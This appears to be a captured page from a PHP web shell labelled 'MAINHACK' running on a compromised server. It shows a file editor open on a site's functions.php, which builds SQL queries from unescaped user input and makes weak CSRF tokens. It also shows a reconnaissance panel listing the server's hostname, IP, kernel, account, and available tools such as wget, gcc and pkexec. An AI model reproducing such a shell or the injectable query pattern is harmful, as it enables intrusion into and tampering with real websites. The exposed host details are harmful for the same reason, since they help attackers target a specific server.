[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: functions.php
<?php include("db.php"); function request_is_get() { return $_SERVER['REQUEST_METHOD'] === 'GET'; } function request_is_post() { return $_SERVER['REQUEST_METHOD'] === 'POST'; } function has_permission($userid, $permission_name, $permission_type, $new) { // Prepare the query to check if the user has the specified permission $query = " SELECT * FROM permissions2 JOIN user_roles2 ON permissions2.id = user_roles2.permission_id WHERE user_roles2.user_id = '$userid' AND permissions2.permission_name = '$permission_name' "; // Execute the query $perm = mysqli_query($new, $query); // Fetch the result if ($getperm = mysqli_fetch_array($perm)) { // Dynamically return the permission type (e.g., can_view, can_create, can_edit) return isset($getperm[$permission_type]) && $getperm[$permission_type] == 1; } else { // If no permission was found, return false return false; } } function generateRandomString($length) { $characters = '0123456789abcdefghijklmnopABCDEFGHIJKLMNOPQRSTUVWXYZ'; $randomString = ''; for ($i = 0; $i < $length; $i++) { $randomString .= $characters[rand(0, strlen($characters) - 1)]; } return $randomString; } function test_input($data) { $data = trim($data); $data = stripslashes($data); $data = htmlspecialchars($data); return $data; } function request_is_same_domain() { if(!isset($_SERVER['HTTP_REFERER'])) { // No refererer sent, so can't be same domain return false; } else { $referer_host = parse_url($_SERVER['HTTP_REFERER'], PHP_URL_HOST); $server_host = $_SERVER['HTTP_HOST']; return ($referer_host == $server_host) ? true : false; } } function sql_prep($string) { global $new; if($new) { return mysqli_real_escape_string($new, $string); } } //send query function function query($query){ global $new; $result = mysqli_query($new,$query); confirm($result); return $result; } function fetch_array($result){ global $new; return mysqli_fetch_array($result); } //redirection function function redirect($location){ global $new; return header("Location: {$location}"); } function h($string) { return htmlspecialchars($string, ENT_QUOTES, 'UTF-8'); } // Sanitize for JavaScript output function j($string) { return json_encode($string); } // Sanitize for use in a URL function u($string) { return urlencode($string); } function dirty_html($string){ return strip_tags($string); } function filter($string){ return filter_var($string, FILTER_SANITIZE_STRING); } function csrf_token() { return md5(uniqid(rand(), TRUE)); } // Generate and store CSRF token in user session. // Requires session to have been started already. function create_csrf_token() { $token = csrf_token(); $_SESSION['csrf_token'] = $token; $_SESSION['csrf_token_time'] = time(); return $token; } // Destroys a token by removing it from the session. function destroy_csrf_token() { $_SESSION['csrf_token'] = null; $_SESSION['csrf_token_time'] = null; return true; } // Return an HTML tag including the CSRF token // for use in a form. // Usage: echo csrf_token_tag(); function csrf_token_tag() { $token = create_csrf_token(); return "<input type=\"hidden\" id=\"csrf_token\" name=\"csrf_token\" value=\"".$token."\">"; } // Returns true if user-submitted POST token is // identical to the previously stored SESSION token. // Returns false otherwise. function csrf_token_is_valid() { if(isset($_POST['csrf_token'])) { $user_token = $_POST['csrf_token']; $stored_token = $_SESSION['csrf_token']; return $user_token === $stored_token; } else { return false; } } // You can simply check the token validity and // handle the failure yourself, or you can use // this "stop-everything-on-failure" function. function die_on_csrf_token_failure() { if(!csrf_token_is_valid()) { die("CSRF token validation failed."); } } // Optional check to see if token is also recent function csrf_token_is_recent() { $max_elapsed = 60 * 60 * 24; // 1 day if(isset($_SESSION['csrf_token_time'])) { $stored_time = $_SESSION['csrf_token_time']; return ($stored_time + $max_elapsed) >= time(); } else { // Remove expired token destroy_csrf_token(); return false; } } ?>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.7 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002